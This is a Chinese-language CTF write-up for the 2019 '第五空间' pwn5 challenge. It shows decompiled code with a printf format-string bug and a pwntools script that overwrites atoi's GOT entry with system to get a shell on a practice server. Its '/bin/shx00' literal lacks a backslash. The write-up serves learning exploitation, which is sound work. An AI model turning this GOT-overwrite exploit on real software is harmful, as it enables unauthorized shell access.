第五空间2019pwn
检查文件保护
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
32位程序,开了canary和nx,保护性很高,ida分析
int __cdecl main(int a1)
{
unsigned int v1; // eax
int fd; // ST14_4
int result; // eax
int v4; // ecx
unsigned int v5; // et1
char nptr; // [esp+4h] [ebp-80h]
char buf; // [esp+14h] [ebp-70h]
unsigned int v8; // [esp+78h] [ebp-Ch]
int *v9; // [esp+7Ch] [ebp-8h]
v9 = &a1;
v8 = __readgsdword(0x14u);
setvbuf(stdout, 0, 2, 0);
v1 = time(0);
srand(v1);
fd = open("/dev/urandom", 0);//随机数
read(fd, &unk_804C044, 4u);
printf("your name:");
read(0, &buf, 0x63u);
printf("Hello,");
printf(&buf);//格式化漏洞
printf("your passwd:");
read(0, &nptr, 0xFu);
if ( atoi(&nptr) == unk_804C044 )//条件成立得到权限
{
puts("ok!!");
system("/bin/sh");
}
else
{
puts("fail");
}
result = 0;
v5 = __readgsdword(0x14u);
v4 = v5 ^ v8;
if ( v5 != v8 )
sub_80493D0(v4);
return result;
}
虽然可以利用那个判断成立的方式得到权限,但是可以利用格式化漏洞,直接修改atoi函数的got表为system地址,然后输入bin/sh,也能得到shell,经过动态调试得到偏移量为10,exp如下
from pwn import *
r = remote('node3.buuoj.cn',29346)
elf = ELF('./2019pwn5')
atoi_got = elf.got['atoi']
system_plt = elf.plt['system']
payload = fmtstr_payload(10,{atoi_got:system_plt})
r.sendline(payload)
r.sendline('/bin/shx00')
r.interactive()